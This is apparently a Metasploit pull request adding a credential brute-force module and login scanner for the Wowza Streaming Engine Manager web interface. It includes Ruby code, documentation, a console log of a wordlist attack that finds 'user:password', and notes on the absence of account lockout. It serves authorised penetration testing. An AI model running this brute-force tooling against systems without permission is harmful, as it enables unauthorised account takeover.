### PR TITLE
Add Wowza Streaming Engine Manager Login Utility

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/wowza_streaming_engine_manager_login.md
+++ b/documentation/modules/auxiliary/scanner/http/wowza_streaming_engine_manager_login.md
@@ -1,0 +1,66 @@
+## Vulnerable Application
+
+This module will attempt to authenticate to Wowza Streaming Engine
+via Wowza Streaming Engine Manager web interface.
+
+
+## Installation Steps
+
+Download and install [Wowza Streaming Engine](https://portal.wowza.com/account/downloads).
+
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use modules/auxiliary/scanner/http/wowza_streaming_engine_manager_login`
+1. Do: `set rhosts <rhosts>`
+1. Do: `run`
+1. On success you should get valid credentials.
+
+## Options
+
+### USERNAME
+
+The username for Wowza Streaming Engine Manager.
+
+### PASSWORD
+
+The password for Wowza Streaming Engine Manager.
+
+### TARGETURI
+
+The path to Wowza Streaming Engine Manager.
+
+
+## Scenarios
+
+
+### Wowza Streaming Engine Manager Version 4.8.20+1 (build 20220919162035) on Ubuntu 22.04
+
+```
+msf6 > use auxiliary/scanner/http/wowza_streaming_engine_manager_login 
+msf6 auxiliary(scanner/http/wowza_streaming_engine_manager_login) > set rhosts 192.168.200.158
+rhosts => 192.168.200.158
+msf6 auxiliary(scanner/http/wowza_streaming_engine_manager_login) > set username user
+username => user
+msf6 auxiliary(scanner/http/wowza_streaming_engine_manager_login) > set pass_file data/wordlists/unix_passwords.txt
+pass_file => data/wordlists/unix_passwords.txt
+msf6 auxiliary(scanner/http/wowza_streaming_engine_manager_login) > run
+
+[+] 192.168.200.158:8088 - Found Wowza Streaming Engine Manager
+[-] 192.168.200.158:8088 - Failed: 'user:admin'
+[-] 192.168.200.158:8088 - Failed: 'user:123456'
+[-] 192.168.200.158:8088 - Failed: 'user:12345'
+[-] 192.168.200.158:8088 - Failed: 'user:123456789'
+[+] 192.168.200.158:8088 - Success: 'user:password'
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/wowza_streaming_engine_manager_login) > creds
+Credentials
+===========
+
+host             origin           service          public  private   realm  private_type  JtR Format
+----             ------           -------          ------  -------   -----  ------------  ----------
+192.168.200.158  192.168.200.158  8088/tcp (http)  user    password         Password      
+```

--- a/lib/metasploit/framework/login_scanner/wowza_streaming_engine_manager.rb
+++ b/lib/metasploit/framework/login_scanner/wowza_streaming_engine_manager.rb
@@ -1,0 +1,65 @@
+require 'metasploit/framework/login_scanner/http'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+      class WowzaStreamingEngineManager < HTTP
+
+        DEFAULT_PORT = 8088
+        PRIVATE_TYPES = [ :password ].freeze
+        LOGIN_STATUS = Metasploit::Model::Login::Status
+
+        # Checks if the target is Wowza Streaming Engine Manager. The login module should call this.
+        #
+        # @return [Boolean] TrueClass if target is Wowza Streaming Engine Manager, otherwise FalseClass
+        def check_setup
+          res = send_request({ 'uri' => normalize_uri('/enginemanager/login.htm') })
+
+          return false unless res
+          return false unless res.code == 200
+
+          res.body.include?('Wowza Streaming Engine Manager')
+        end
+
+        #
+        # Attempts to login to Wowza Streaming Engine server via Manager web interface
+        #
+        # @param credential [Metasploit::Framework::Credential] The credential object
+        # @return [Result] A Result object indicating success or failure
+        #
+        def attempt_login(credential)
+          result_opts = {
+            credential: credential,
+            status: Metasploit::Model::Login::Status::INCORRECT,
+            proof: nil,
+            host: host,
+            port: port,
+            protocol: 'tcp'
+          }
+
+          res = send_request({
+            'method' => 'POST',
+            'uri' => normalize_uri('/enginemanager/j_spring_security_check'),
+            'vars_post' => {
+              'wowza-page-redirect' => '',
+              'j_username' => credential.public.to_s,
+              'j_password' => credential.private.to_s,
+              'host' => 'http://localhost:8087'
+            }
+          })
+
+          unless res
+            result_opts.merge!({ status: LOGIN_STATUS::UNABLE_TO_CONNECT })
+          end
+
+          if res && res.code == 302 && res['location'].to_s.include?('Home.htm')
+            cookie = res.get_cookies
+            result_opts.merge!({ status: LOGIN_STATUS::SUCCESSFUL, proof: cookie.to_s }) unless cookie.blank?
+          end
+
+          Result.new(result_opts)
+        end
+      end
+    end
+  end
+end

--- a/modules/auxiliary/scanner/http/wowza_streaming_engine_manager_login.rb
+++ b/modules/auxiliary/scanner/http/wowza_streaming_engine_manager_login.rb
@@ -1,0 +1,134 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'metasploit/framework/login_scanner/wowza_streaming_engine_manager'
+require 'metasploit/framework/credential_collection'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::AuthBrute
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Wowza Streaming Engine Manager Login Utility',
+        'Description' => %q{
+          This module will attempt to authenticate to Wowza Streaming Engine
+          via Wowza Streaming Engine Manager web interface.
+        },
+        'Author' => [ 'bcoles' ],
+        'License' => MSF_LICENSE,
+        'Platform' => %w[linux win osx],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
+
+    register_options([
+      Opt::RPORT(8088),
+      OptString.new('USERNAME', [true, 'The username for Wowza Streaming Engine Manager', '']),
+      OptString.new('PASSWORD', [false, 'The password to Wowza Streaming Engine Manager', '']),
+      OptString.new('TARGETURI', [false, 'The path to Wowza Streaming Engine Manager', '/'])
+
+    ])
+  end
+
+  def scanner(ip)
+    @scanner ||= lambda {
+      cred_collection = build_credential_collection(
+        username: datastore['USERNAME'],
+        password: datastore['PASSWORD']
+      )
+
+      return Metasploit::Framework::LoginScanner::WowzaStreamingEngineManager.new(
+        configure_http_login_scanner(
+          host: ip,
+          port: datastore['RPORT'],
+          uri: datastore['TARGETURI'],
+          cred_details: cred_collection,
+          stop_on_success: datastore['STOP_ON_SUCCESS'],
+          bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
+          connection_timeout: 5,
+          http_username: datastore['HttpUsername'],
+          http_password: datastore['HttpPassword']
+        )
+      )
+    }.call
+  end
+
+  def report_good_cred(ip, port, result)
+    service_data = {
+      address: ip,
+      port: port,
+      service_name: 'http',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      module_fullname: fullname,
+      origin_type: :service,
+      private_data: result.credential.private,
+      private_type: :password,
+      username: result.credential.public
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      last_attempted_at: DateTime.now,
+      status: result.status,
+      proof: result.proof
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
+  def report_bad_cred(ip, rport, result)
+    invalidate_login(
+      address: ip,
+      port: rport,
+      protocol: 'tcp',
+      public: result.credential.public,
+      private: result.credential.private,
+      realm_key: result.credential.realm_key,
+      realm_value: result.credential.realm,
+      status: result.status,
+      proof: result.proof
+    )
+  end
+
+  def bruteforce(ip)
+    scanner(ip).scan! do |result|
+      case result.status
+      when Metasploit::Model::Login::Status::SUCCESSFUL
+        print_brute(level: :good, ip: ip, msg: "Success: '#{result.credential}'")
+        report_good_cred(ip, rport, result)
+      when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+        vprint_brute(level: :verror, ip: ip, msg: result.proof)
+        report_bad_cred(ip, rport, result)
+      when Metasploit::Model::Login::Status::INCORRECT
+        vprint_brute(level: :verror, ip: ip, msg: "Failed: '#{result.credential}'")
+        report_bad_cred(ip, rport, result)
+      end
+    end
+  end
+
+  def run_host(ip)
+    if scanner(ip).check_setup
+      vprint_brute(level: :good, ip: ip, msg: 'Found Wowza Streaming Engine Manager')
+    else
+      print_brute(level: :error, ip: ip, msg: 'Wowza Streaming Engine Manager not found')
+      return
+    end
+
+    bruteforce(ip)
+  end
+end


### PR DESCRIPTION
Should work on Windows/Mac/Linux. Tested on Ubuntu 22.04 and Windows 7SP1.

I found no options to enable account lockout functionality and no account lockout documentation either. If this feature exists, it is not enabled by default.

The REST API is exposed by default on all interfaces `0.0.0.0` on port 8087 and validates authentication credentials; however, IP address access controls limit network access to this interface to `127.0.0.1` by default.

```xml
                <RESTInterface>
                        <Enable>true</Enable>
                        <IPAddress>*</IPAddress>
                        <Port>8087</Port>
                        <!-- none, basic, digest, remotehttp, digestfile-->
                        <AuthenticationMethod>basic</AuthenticationMethod>
                        <!-- cleartext, bcrypt, md5, sha256 -->
                        <PasswordEncodingScheme>bcrypt</PasswordEncodingScheme>
                        <DiagnosticURLEnable>true</DiagnosticURLEnable>
                        <SSLConfig>
                                <Enable>false</Enable>
                                <KeyStorePath></KeyStorePath>
                                <KeyStorePassword></KeyStorePassword>
                                <KeyStoreType>JKS</KeyStoreType>
                                <SSLProtocol>TLS</SSLProtocol>
                                <Algorithm>SunX509</Algorithm>
                                <CipherSuites></CipherSuites>
                                <Protocols></Protocols>
                        </SSLConfig>
                        <IPWhiteList>127.0.0.1</IPWhiteList>
                        <IPBlackList></IPBlackList>
                        <EnableXMLFile>false</EnableXMLFile>
                        <DocumentationServerEnable>false</DocumentationServerEnable>
                        <DocumentationServerPort>8089</DocumentationServerPort>
                        <!-- none(only) -->
                        <DocumentationServerAuthenticationMethod>none</DocumentationServerAuthenticationMethod>
                        <Properties>
                        </Properties>
                </RESTInterface>
```

The intended login workflow is to authenticate via the Manager web interface and specify which backend REST API to connect to during login (`http://127.0.0.1:8087/` by default).

---

## Vulnerable Application

This module will attempt to authenticate to Wowza Streaming Engine
via Wowza Streaming Engine Manager web interface.


## Installation Steps

Download and install [Wowza Streaming Engine](https://portal.wowza.com/account/downloads).


## Verification Steps

1. Install the application
1. Start msfconsole
1. Do: `use modules/auxiliary/scanner/http/wowza_streaming_engine_manager`
1. Do: `set rhosts <rhosts>`
1. Do: `run`
1. On success you should get valid credentials.

## Options

### USERNAME

The username for Wowza Streaming Engine Manager.

### PASSWORD

The password for Wowza Streaming Engine Manager.

### TARGETURI

The path to Wowza Streaming Engine Manager.


## Scenarios


### Wowza Streaming Engine Manager Version 4.8.20+1 (build 20220919162035) on Ubuntu 22.04

```
msf6 > use auxiliary/scanner/http/wowza_streaming_engine_manager_login 
msf6 auxiliary(scanner/http/wowza_streaming_engine_manager_login) > set rhosts 192.168.200.158
rhosts => 192.168.200.158
msf6 auxiliary(scanner/http/wowza_streaming_engine_manager_login) > set username user
username => user
msf6 auxiliary(scanner/http/wowza_streaming_engine_manager_login) > set pass_file data/wordlists/unix_passwords.txt
pass_file => data/wordlists/unix_passwords.txt
msf6 auxiliary(scanner/http/wowza_streaming_engine_manager_login) > run

[+] 192.168.200.158:8088 - Found Wowza Streaming Engine Manager
[-] 192.168.200.158:8088 - Failed: 'user:admin'
[-] 192.168.200.158:8088 - Failed: 'user:123456'
[-] 192.168.200.158:8088 - Failed: 'user:12345'
[-] 192.168.200.158:8088 - Failed: 'user:123456789'
[+] 192.168.200.158:8088 - Success: 'user:password'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/wowza_streaming_engine_manager_login) > creds
Credentials
===========

host             origin           service          public  private   realm  private_type  JtR Format
----             ------           -------          ------  -------   -----  ------------  ----------
192.168.200.158  192.168.200.158  8088/tcp (http)  user    password         Password      
```
